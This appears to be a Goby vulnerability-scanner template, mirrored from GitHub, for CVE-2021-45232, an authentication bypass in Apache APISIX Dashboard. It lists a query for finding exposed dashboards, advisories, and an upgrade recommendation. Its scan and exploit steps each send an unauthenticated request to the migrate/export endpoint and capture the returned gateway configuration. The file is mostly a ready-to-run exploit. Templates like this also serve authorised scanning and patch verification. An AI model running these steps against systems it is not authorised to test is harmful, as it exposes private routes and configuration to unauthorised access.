mirror of https://github.com/qwqdanchun/Goby.git
118 lines
5.1 KiB
JSON
118 lines
5.1 KiB
JSON
{
|
|
"Name": "Apache APISIX Dashboard API Unauthorized Access CVE-2021-45232",
|
|
"Level": "3",
|
|
"Tags": [
|
|
"unauthorizedaccess"
|
|
],
|
|
"GobyQuery": "title=\"Apache APISIX Dashboard\"",
|
|
"Description": "The Apache APISIX Dashboard is designed to make it as easy as possible for users to operate Apache APISIX through a frontend interface.",
|
|
"Product": "Apache APISIX Dashboard",
|
|
"Homepage": "https://apisix.apache.org/",
|
|
"Author": "",
|
|
"Impact": "In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.",
|
|
"Recommendation": "Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.",
|
|
"References": [
|
|
"https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/",
|
|
"https://github.com/pingpongcult/CVE-2021-45232",
|
|
"https://github.com/advisories/GHSA-wcxq-f256-53xp",
|
|
"https://twitter.com/403Timeout/status/1475715079173976066",
|
|
"https://github.com/wuppp/cve-2021-45232-exp",
|
|
"https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247487772&idx=2&sn=09b6c93b14f10f4cb41aecc94ce71c75"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/apisix/admin/migrate/export",
|
|
"follow_redirect": false,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "Consumers\":[],\"Routes\":",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "PluginConfigs\":",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/apisix/admin/migrate/export",
|
|
"follow_redirect": false,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "Consumers\":[],\"Routes\":",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "PluginConfigs\":",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "0000-00-00 00:00:00",
|
|
"GobyVersion": "0.0.0"
|
|
} |